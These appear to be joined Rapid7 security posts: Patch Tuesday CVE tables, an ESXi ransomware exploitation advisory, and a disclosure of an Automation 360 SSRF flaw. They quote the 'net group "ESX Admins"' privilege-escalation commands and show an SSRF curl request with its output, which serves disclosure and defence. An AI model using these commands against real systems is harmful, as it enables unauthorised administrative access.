CVE-2024-38222 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38168 .NET and Visual Studio Denial of Service Vulnerability No No 7.5
CVE-2024-38157 Azure IoT SDK Remote Code Execution Vulnerability No No 7
CVE-2024-38158 Azure IoT SDK Remote Code Execution Vulnerability No No 7
CVE-2024-38167 .NET and Visual Studio Information Disclosure Vulnerability No No 6.5

Mariner Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2022-2601 Redhat: CVE-2022-2601 grub2 - Buffer overflow in grub_font_construct_glyph() can lead to out-of-bound write and possible secure boot bypass No No 8.6
CVE-2022-3775 Redhat: CVE-2022-3775 grub2 - Heap based out-of-bounds write when rendering certain Unicode sequences No No 7.1

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38166 Microsoft Dynamics 365 Cross-site Scripting Vulnerability No No 8.2
CVE-2024-38211 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 8.2

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability Yes No 8.8
CVE-2024-38206 Microsoft Copilot Studio Information Disclosure Vulnerability No No 8.5
CVE-2024-38171 Microsoft PowerPoint Remote Code Execution Vulnerability No No 7.8
CVE-2024-38084 Microsoft OfficePlus Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38169 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2024-38172 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2024-38170 Microsoft Excel Remote Code Execution Vulnerability No No 7.1
CVE-2024-38173 Microsoft Outlook Remote Code Execution Vulnerability No No 6.7
CVE-2024-38197 Microsoft Teams for iOS Spoofing Vulnerability No No 6.5
CVE-2024-38200 Microsoft Office Spoofing Vulnerability No Yes 6.5

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38159 Windows Network Virtualization Remote Code Execution Vulnerability No No 9.1
CVE-2024-38160 Windows Network Virtualization Remote Code Execution Vulnerability No No 9.1
CVE-2024-38163 Windows Update Stack Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38142 Windows Secure Kernel Mode Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38135 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38184 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38185 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38186 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38187 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38133 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38150 Windows DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38215 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38147 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38148 Windows Secure Channel Denial of Service Vulnerability No No 7.5
CVE-2024-38138 Windows Deployment Services Remote Code Execution Vulnerability No No 7.5
CVE-2024-38202 Windows Update Stack Elevation of Privilege Vulnerability No Yes 7.3
CVE-2024-38136 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability No No 7
CVE-2024-38137 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability No No 7
CVE-2024-38106 Windows Kernel Elevation of Privilege Vulnerability Yes No 7
CVE-2024-38161 Windows Mobile Broadband Driver Remote Code Execution Vulnerability No No 6.8
CVE-2024-21302 Windows Secure Kernel Mode Elevation of Privilege Vulnerability No Yes 6.7
CVE-2024-38165 Windows Compressed Folder Tampering Vulnerability No No 6.5
CVE-2024-38155 Security Center Broker Information Disclosure Vulnerability No No 5.5
CVE-2024-38123 Windows Bluetooth Driver Information Disclosure Vulnerability No No 4.4
CVE-2024-38143 Windows WLAN AutoConfig Service Elevation of Privilege Vulnerability No No 4.2

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38063 Windows TCP/IP Remote Code Execution Vulnerability No No 9.8
CVE-2024-38140 Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability No No 9.8
CVE-2024-38199 Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability No Yes 9.8
CVE-2024-38180 Windows SmartScreen Security Feature Bypass Vulnerability No No 8.8
CVE-2024-38121 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-38128 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-38130 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-38154 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-38120 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-38114 Windows IP Routing Management Snapin Remote Code Execution Vulnerability No No 8.8
CVE-2024-38115 Windows IP Routing Management Snapin Remote Code Execution Vulnerability No No 8.8
CVE-2024-38116 Windows IP Routing Management Snapin Remote Code Execution Vulnerability No No 8.8
CVE-2024-38144 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 8.8
CVE-2024-38131 Clipboard Virtual Channel Extension Remote Code Execution Vulnerability No No 8.8
CVE-2023-40547 Redhat: CVE-2023-40547 Shim - RCE in HTTP boot support may lead to secure boot bypass No No 8.3
CVE-2024-29995 Windows Kerberos Elevation of Privilege Vulnerability No No 8.1
CVE-2024-38107 Windows Power Dependency Coordinator Elevation of Privilege Vulnerability Yes No 7.8
CVE-2024-38152 Windows OLE Remote Code Execution Vulnerability No No 7.8
CVE-2024-38153 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38127 Windows Hyper-V Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38196 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38193 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Yes No 7.8
CVE-2024-38141 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38117 NTFS Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38125 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38134 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38191 Kernel Streaming Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38198 Windows Print Spooler Elevation of Privilege Vulnerability No No 7.5
CVE-2024-38126 Windows Network Address Translation (NAT) Denial of Service Vulnerability No No 7.5
CVE-2024-38132 Windows Network Address Translation (NAT) Denial of Service Vulnerability No No 7.5
CVE-2024-38145 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability No No 7.5
CVE-2024-38146 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability No No 7.5
CVE-2024-37968 Windows DNS Spoofing Vulnerability No No 7.5
CVE-2024-38178 Scripting Engine Memory Corruption Vulnerability Yes No 7.5
CVE-2024-38223 Windows Initial Machine Configuration Elevation of Privilege Vulnerability No No 6.8
CVE-2024-38214 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2024-38213 Windows Mark of the Web Security Feature Bypass Vulnerability Yes No 6.5
CVE-2024-38151 Windows Kernel Information Disclosure Vulnerability No No 5.5
CVE-2024-38118 Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability No No 5.5
CVE-2024-38122 Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability No No 5.5


  • 2024-08-14: Minor correction/clarification to the comparison of MotW bypass CVE-2024-38213 with a related older vulnerability.
VMware ESXi CVE-2024-37085 Targeted in Ransomware Campaigns

On Monday, July 29, Microsoft published an extensive threat intelligence blog on observed exploitation of CVE-2024-37085, an Active Directory integration authentication bypass vulnerability affecting Broadcom VMware ESXi hypervisors. The vulnerability, according to Redmond, was identified in zero-day attacks and has evidently been used by at least half a dozen ransomware operations to obtain full administrative permissions on domain-joined ESXi hypervisors (which, in turn, enables attackers to encrypt downstream file systems). CVE-2024-37085 was one of multiple issues fixed in a June 25 advisory from Broadcom; it appears to have been exploited as a zero-day vulnerability.

Per Broadcom’s advisory, successful exploitation of CVE-2024-37085 allows attackers “with sufficient Active Directory (AD) permissions to gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group (‘ESXi Admins’ by default) after it was deleted from Active Directory.”

Notably, Broadcom’s advisory differs from Microsoft’s description, which says: “VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist.”

Also of note: While the VMware advisory indicates ESXi Admins is the default AD group, the Microsoft observations quoted in this blog all indicate use of ESX Admins rather than ESXi Admins.

ESXi hypervisors have been a popular target for ransomware groups in years past. Notably, since ESXi should not be internet-exposed, we would not expect CVE-2024-37085 to be an initial access vector — adversaries will typically need to have already obtained a foothold in target environments to be able to exploit the vulnerability to escalate privileges.


Microsoft researchers discovered CVE-2024-37085 after it was used as a post-compromise attack technique used by a number of ransomware operators, including Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest. The attacks Microsoft observed included use of the following commands, which first create a group named “ESX Admins” in the domain and then adds a user to that group:

net group “ESX Admins” /domain /add
net group “ESX Admins” username /domain /add

Microsoft identified three methods for exploiting CVE-2024-37085, including the in-the-wild technique described above:

  • Adding the “ESX Admins” group to the domain and adding a user to it (observed in the wild): If the “ESX Admins” group doesn’t exist, any domain user with the ability to create a group can escalate privileges to full administrative access to domain-joined ESXi hypervisors by creating such a group, and then adding themselves, or other users in their control, to the group.
  • Renaming any group in the domain to “ESX Admins” and adding a user to the group or using an existing group member: This requires an attacker to have access to a user that has the capability to rename arbitrary groups (i.e., by renaming one of them “ESX Admins”). The threat actor can then add a user, or leverage a user that already exists in the group, to escalate privileges to full administrative access.
  • ESXi hypervisor privileges refresh: Even if the network administrator assigns any other group in the domain to be the management group for the ESXi hypervisor, the full administrative privileges to members of the “ESX Admins” group are not immediately removed and threat actors still could abuse it.

Mitigation guidance

The following products and versions are vulnerable to CVE-2024-37085:

The Broadcom advisory on CVE-2024-37085 links to a workaround that modifies several advanced ESXi settings to be more secure; the workaround page notes that for all versions of ESXi (prior to ESXi 8.0 U3), “several ESXi advanced settings have default values that are not secure by default. The AD group "ESX Admins" is automatically given the VIM Admin role when an ESXi host is joined to an Active Directory domain.”

Broadcom VMware ESXi and Cloud Foundation customers should update to a supported fixed version as soon as possible. Administrators who are unable to update should implement workaround recommendations in the interim. ESXi servers should never be exposed to the public internet. Microsoft has additional recommendations on mitigating risk of exploitation in their blog.

Rapid7 customers

InsightVM and Nexpose customers who use ESXi hypervisors within their environments can assess their exposure to CVE-2024-37085 for the 8.x version stream with a vulnerability check available since June 2024. Support for scanning 7.0 is expected to be available in the July 30 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this vulnerability:

  • Attacker Technique - Creation of "ESX Admins" Domain Group using Net.exe
CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery

Automation 360 Robotic Process Automation suite v21-v32 is vulnerable to unauthenticated Server-Side Request Forgery (SSRF). SSRF occurs when the server can be induced to perform arbitrary requests on behalf of an attacker. An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.

Product Description

Automation Anywhere Automation 360 is a leading Robotic Process Automation suite, used by many private-sector businesses and government agencies. Its primary purpose is low-code automated workflow creation and task orchestration. A primary “Control Room” server communicates with client agents, and those client agents execute automated “bot” workflows. These workflows leverage extensible feature modules that facilitate activities like automated web browsing, SQL database interop, and execution of various types of scripts and compiled binaries via the client agent.

This security research project was specifically focused on the unauthenticated attack surface of the Control Room server. Based on attack surface reconnaissance, approximately 3,500 Control Room servers are exposed to the public internet.


This issue was discovered by Ryan Emmons, Lead Security Researcher at Rapid7, and it is being disclosed in accordance with Rapid7's vulnerability disclosure policy. Rapid7 is grateful to Automation Anywhere for their prompt assistance evaluating and coordinating a disclosure for this issue.

Vendor Statement

Automation Anywhere wants to thank Rapid7 for the discovery of an issue, that is now reported as CVE-2024-6922 in Automation 360 v.32 and earlier. We have notified our customers of the mitigation.


These requests can be used to target internal network services that are not otherwise reachable. Blind SSRF can be weaponized to discover and exploit common internal enterprise systems via SSRF canaries and timing-based port scans. Furthermore, the vulnerability also makes localhost-only system web services reachable to attackers. For example, unauthenticated attackers can direct Automation 360 to perform arbitrary POST web requests to the back end web services behind Traefik, the Elastic API, and internal Windows web APIs. These capabilities subvert expectations of what should and should not be publicly reachable for unauthenticated users.


The spring/authn-context-global-security-urls.xml file within kernel.jar contains Spring security filter definitions for the front-facing Automation 360 Control Room web application. In the XML, the URL pattern /v1/proxy/test is set to allow unauthenticated access:

        <!-- proxy -->
        <sec:intercept-url pattern="/v1/proxy/test" access="permitAll()"/>

The testSDSProxyCredentials function that implements that API endpoint is found in com/automationanywhere/proxy/service/impl/ It expects a JSON saasUrl value in the POST request body, which it then uses in a format string for a new POST request to a “cloud control room”. This decompiled code is shown below, with number identifier comments added. At [1], tainted data is formatted into the URL string. At [2], an HttpURLConnection is opened to the URL, then the response data stream is fetched at [3]. The response is not returned to the attacker.

public void testSDSProxyCredentials(
    final SDSProxyCredTestRequest proxyCredsToTest) {
  if (proxyCredsToTest.getSaasUrl().isEmpty()) {
    throw new IllegalArgumentException(
        "Please provide a valid SaaS system url.");
  final String saasUrl = String.format(
      "https://%s/v1/authentication", proxyCredsToTest.getSaasUrl()); // [1]
  HttpURLConnection httpURLConnection = null;
  final String proxyUsername = proxyCredsToTest.getUsername();
  final String proxyPassword = proxyCredsToTest.getPassword();
  final boolean proxyCredsPassed = !proxyUsername.isEmpty();
      "Unable to connect to cloud control room.";
  try {
    try {
      httpURLConnection = ProxyUtil.getConnection(saasUrl); // [2]
      httpURLConnection.setRequestProperty("Content-Type", "application/json");
    } catch (final Exception e) {

      throw new RuntimeException(e);
    if (proxyCredsPassed) {
          saasUrl, httpURLConnection, proxyUsername, proxyPassword);

    try {
      final DataOutputStream wr =
          new DataOutputStream(httpURLConnection.getOutputStream()); // [3]
      try {

        final int responseCode = httpURLConnection.getResponseCode();
        if (responseCode != 400) {
          InputStream inputStream;
          try {
            inputStream = httpURLConnection.getInputStream();
          } catch (final IOException ioe) {
            inputStream = httpURLConnection.getErrorStream();
          final BufferedReader in = new BufferedReader(
              new InputStreamReader(inputStream, StandardCharsets.UTF_8));

          try {
            final String errorMessage =
                CLOUD_CR_CONNECTION_FAILED + " error code: {} msg: {}",

                (Object) responseCode, (Object) errorMessage);


            throw new IllegalStateException(CLOUD_CR_CONNECTION_FAILED);
          } catch (final Throwable t) {
            try {
            } catch (final Throwable exception) {
            throw t;
      } catch (final Throwable t2) {
        try {
        } catch (final Throwable exception2) {
        } throw t2;
    } catch (final IOException e2) {
          ProxyAuditValue.PROXY_CONNECTIVITY_TEST_FAILURE, e2.getMessage());
      throw new IllegalStateException(CLOUD_CR_CONNECTION_FAILED);
  } finally {

As outlined in the code, the attacker-controlled host name has the HTTPS scheme prepended and the /v1/authentication path appended. However, a hash symbol can be used to escape the existing path, and the attacker can specify an arbitrary basic authentication string, port, and set of URL parameters for the resulting POST request. The unauthenticated request is demonstrated below, targeting a URL for easy access logging.

$ curl -vvv '' -d '{"saasUrl":""}'
*   Trying
* Connected to ( port 80 (#0)
> POST /v1/proxy/test HTTP/1.1
> Host:
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
* Mark bundle as not supporting multiuse
< HTTP/1.1 400 Bad Request
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Content-Security-Policy: default-src 'self' ; frame-src 'self' https://* https://* https://* https://* https://*
< Content-Type: application/json
< Date: Thu, 23 May 2024 00:05:20 GMT
< Expires: 0
< Pragma: no-cache
< Referrer-Policy: same-origin
< Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-Xss-Protection: 1; mode=block
< Transfer-Encoding: chunked
* Connection #0 to host left intact
{"message":"Unable to connect to cloud control room."}

The listening HTTPS server then receives a POST request from the Automation 360 server:

CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery


Automation Anywhere indicated to Rapid7 that this issue had been fixed in version 33 of the product even before Rapid7 reported the issue to them. The vendor listed the affected versions as v21 to v32.

Automation Anywhere has indicated to Rapid7 that per the release notes, this issue has been fixed in Automation 360 v.33 that was available on June 17, 2024. The vendor reinforced that customers on older versions should upgrade to Automation 360 v.33 to get the vulnerability resolved. More information is available on the A360 Release Notes portal at

Rapid7 Customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-6922 with a vulnerability check expected to be available in today’s (Friday, July 26) content release.

Disclosure Timeline

June 17, 2024: Rapid7 makes initial contact with Automation Anywhere
June 21, 2024: Automation Anywhere confirms contact mechanism for vulnerability disclosure
June 24, 2024: Rapid7 provides Automation Anywhere with technical details.
July 1, 2024: Automation Anywhere confirmed the Rapid7 findings and found that the vulnerable code had coincidentally been removed from v33 prior to Rapid7 outreach.
July 2, 2024: Rapid7 requests additional information on affected product versions and remediation guidance
July 18, 2024: Automation Anywhere confirms affected product versions and shares plan to disclose the vulnerability to customers via release notes as of July 26, 2024. Rapid7 reserves CVE-2024-6922.
July 25, 2024: Rapid7 and Automation Anywhere confirm remediation guidance and coordinated disclosure timing.
July 26, 2024: This disclosure.

Patch Tuesday - July 2024

Microsoft is addressing 139 vulnerabilities this July 2024 Patch Tuesday, which is on the high side in terms of typical CVE counts. They’ve also republished details for 4 CVEs issued by other vendors that affect Microsoft products. Microsoft has evidence of in-the-wild exploitation for 2 of the vulnerabilities published today. At time of writing, none of the vulnerabilities patched today are listed in CISA’s Known Exploited Vulnerabilities catalog, though we can expect CVE-2024-38080 and CVE-2024-38112 to appear there in short order. Microsoft is also patching 5 critical remote code execution (RCE) vulnerabilities today.

Windows Hyper-V: zero-day EoP

CVE-2024-38080 is an elevation of privilege (EoP) vulnerability affecting Microsoft’s Hyper-V virtualization functionality. Successful exploitation will give an attacker SYSTEM-level privileges. Only more recent editions of Windows are affected; Windows 11 since version 21H2 and Windows Server 2022 (including Server Core).

Windows MSHTML Platform: zero-day Spoofing

The other vulnerability seen exploited in the wild this month is CVE-2024-38112, a Spoofing vulnerability affecting Microsoft’s MSHTML browser engine which can be found on all versions of Windows, including Server editions. User interaction is required for exploitation – for example, a threat actor would need to send the victim a malicious file and convince them to open it. Microsoft is characteristically cagey about what exactly can be spoofed here, though they do indicate that the associated Common Weakness Enumeration (CWE) is CWE-668: Exposure of Resource to Wrong Sphere, which is defined as providing unintended actors with inappropriate access to a resource.

SharePoint: critical post-auth RCE

Similar to a vulnerability seen in May, CVE-2024-38023 is a SharePoint vulnerability that could allow an authenticated attacker with Site Owner permissions or higher to upload a specially crafted file to a SharePoint Server, then craft malicious API requests to trigger deserialization of the file's parameters, thus enabling them to achieve remote code execution in the context of the SharePoint Server. The CVSS base score of 7.2 reflects the requirement of Site Owner privileges or higher to exploit the vulnerability.

Windows Imaging: critical RCE

All supported versions of Windows (and almost certainly unsupported versions as well) are vulnerable to CVE-2024-38060, a flaw in the Windows Imaging Component related to TIFF (Tagged Image File Format) image processing that could allow an attacker to execute arbitrary code on a system. The example scenario Microsoft provides is simply of an authenticated attacker uploading a specially crafted TIFF image to a server in order to exploit this.

Remote Desktop Licensing Service: multiple critical RCEs

Three critical CVEs related to the Windows Remote Desktop Licensing Service were patched this month. CVE-2024-38074, CVE-2024-38076, and CVE-2024-38077. All three of these carry a CVSS 3.1 base score of 9.8 – if you rely on the Remote Desktop licensing service, best get patching immediately. As a mitigation, consider disabling the service entirely until there is an opportunity to apply the update.

SQL Server

Microsoft has patched a host of CVEs affecting SQL Server, all with a CVSS 3.1 base score of 8.8 and allowing RCE. These specifically affect the OLE DB Provider, so not only do SQL Server instances need to be updated, but client code running vulnerable versions of the connection driver will also need to be addressed. For example, an attacker could use social engineering tactics to dupe an authenticated user into attempting to connect to a SQL Server database configured to return malicious data, allowing arbitrary code execution on the client.

Lifecycle update

Also in SQL Server news this month, Microsoft SQL Server 2014 moves past the end of extended support. From this point onward, Microsoft only guarantees to provide SQL Server 2014 security updates to customers who pay for the Extended Security Updates program.

Summary charts

Patch Tuesday - July 2024
Patch Tuesday - July 2024
Patch Tuesday - July 2024

Summary tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38092 Azure CycleCloud Elevation of Privilege Vulnerability No No 8.8
CVE-2024-35261 Azure Network Watcher VM Extension Elevation of Privilege Vulnerability No No 7.8
CVE-2024-35266 Azure DevOps Server Spoofing Vulnerability No No 7.6
CVE-2024-35267 Azure DevOps Server Spoofing Vulnerability No No 7.6
CVE-2024-38086 Azure Kinect SDK Remote Code Execution Vulnerability No No 6.4

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-35264 .NET and Visual Studio Remote Code Execution Vulnerability No Yes 8.1
CVE-2024-38095 .NET and Visual Studio Denial of Service Vulnerability No No 7.5
CVE-2024-30105 .NET Core and Visual Studio Denial of Service Vulnerability No No 7.5
CVE-2024-38081 .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability No No 7.3

ESU Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38077 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability No No 9.8
CVE-2024-38074 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability No No 9.8
CVE-2024-38053 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability No No 8.8
CVE-2024-38060 Windows Imaging Component Remote Code Execution Vulnerability No No 8.8
CVE-2024-38104 Windows Fax Service Remote Code Execution Vulnerability No No 8.8
CVE-2024-28899 Secure Boot Security Feature Bypass Vulnerability No No 8.8
CVE-2024-37973 Secure Boot Security Feature Bypass Vulnerability No No 8.4
CVE-2024-37984 Secure Boot Security Feature Bypass Vulnerability No No 8.4
CVE-2024-37969 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37970 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37974 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37986 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37987 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37971 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37972 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37975 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37988 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37989 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-38010 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-38011 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-38050 Windows Workstation Service Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38066 Windows Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30079 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38070 Windows LockDown Policy (WLDP) Security Feature Bypass Vulnerability No No 7.8
CVE-2024-38051 Windows Graphics Component Remote Code Execution Vulnerability No No 7.8
CVE-2024-38085 Windows Graphics Component Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38079 Windows Graphics Component Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38034 Windows Filtering Platform Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38054 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38052 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38057 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-39684 Github: CVE-2024-39684 TenCent RapidJSON Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38064 Windows TCP/IP Information Disclosure Vulnerability No No 7.5
CVE-2024-38071 Windows Remote Desktop Licensing Service Denial of Service Vulnerability No No 7.5
CVE-2024-38073 Windows Remote Desktop Licensing Service Denial of Service Vulnerability No No 7.5
CVE-2024-38015 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability No No 7.5
CVE-2024-38031 Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability No No 7.5
CVE-2024-38067 Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability No No 7.5
CVE-2024-38068 Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability No No 7.5
CVE-2024-38112 Windows MSHTML Platform Spoofing Vulnerability Yes No 7.5
CVE-2024-30098 Windows Cryptographic Services Security Feature Bypass Vulnerability No No 7.5
CVE-2024-38091 Microsoft WS-Discovery Denial of Service Vulnerability No No 7.5
CVE-2024-38061 DCOM Remote Cross-Session Activation Elevation of Privilege Vulnerability No No 7.5
CVE-2024-3596 CERT/CC: CVE-2024-3596 RADIUS Protocol Spoofing Vulnerability No No 7.5
CVE-2024-38033 PowerShell Elevation of Privilege Vulnerability No No 7.3
CVE-2024-38025 Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability No No 7.2
CVE-2024-38019 Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability No No 7.2
CVE-2024-38028 Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability No No 7.2
CVE-2024-38044 DHCP Server Service Remote Code Execution Vulnerability No No 7.2
CVE-2024-30081 Windows NTLM Spoofing Vulnerability No No 7.1
CVE-2024-38022 Windows Image Acquisition Elevation of Privilege Vulnerability No No 7
CVE-2024-38065 Secure Boot Security Feature Bypass Vulnerability No No 6.8
CVE-2024-38058 BitLocker Security Feature Bypass Vulnerability No No 6.8
CVE-2024-38013 Microsoft Windows Server Backup Elevation of Privilege Vulnerability No No 6.7
CVE-2024-38049 Windows Distributed Transaction Coordinator Remote Code Execution Vulnerability No No 6.6
CVE-2024-38030 Windows Themes Spoofing Vulnerability No No 6.5
CVE-2024-38048 Windows Network Driver Interface Specification (NDIS) Denial of Service Vulnerability No No 6.5
CVE-2024-38027 Windows Line Printer Daemon Service Denial of Service Vulnerability No No 6.5
CVE-2024-38102 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability No No 6.5
CVE-2024-38101 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability No No 6.5
CVE-2024-38105 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability No No 6.5
CVE-2024-38099 Windows Remote Desktop Licensing Service Denial of Service Vulnerability No No 5.9
CVE-2024-38055 Microsoft Windows Codecs Library Information Disclosure Vulnerability No No 5.5
CVE-2024-38056 Microsoft Windows Codecs Library Information Disclosure Vulnerability No No 5.5
CVE-2024-38017 Microsoft Message Queuing Information Disclosure Vulnerability No No 5.5
CVE-2024-35270 Windows iSCSI Service Denial of Service Vulnerability No No 5.3
CVE-2024-30071 Windows Remote Access Connection Manager Information Disclosure Vulnerability No No 4.7

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-30061 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability No No 7.3

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38021 Microsoft Office Remote Code Execution Vulnerability No No 8.8
CVE-2024-32987 Microsoft SharePoint Server Information Disclosure Vulnerability No No 7.5
CVE-2024-38023 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.2
CVE-2024-38024 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.2
CVE-2024-38094 Microsoft SharePoint Remote Code Execution Vulnerability No No 7.2
CVE-2024-38020 Microsoft Outlook Spoofing Vulnerability No No 6.5

SQL Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38088 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-38087 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21332 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21333 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21335 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21373 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21398 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21414 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21415 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21428 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
